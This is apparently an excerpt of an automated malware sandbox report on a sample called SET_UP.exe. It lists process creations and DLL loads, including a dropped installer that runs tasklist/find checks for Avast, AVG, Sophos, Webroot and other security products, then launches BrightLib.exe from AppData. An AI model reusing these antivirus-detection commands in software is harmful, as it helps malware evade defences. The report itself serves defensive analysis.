            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\timeout.exe "timeout" 9
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: webio.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SET_UP.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wtsapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: winsta.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: shfolder.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: rstrtmgr.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wtsapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: winsta.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: shfolder.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: rstrtmgr.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: sfc.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: sfc_os.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: explorerframe.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: dlnashext.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: wpdshext.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
            Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
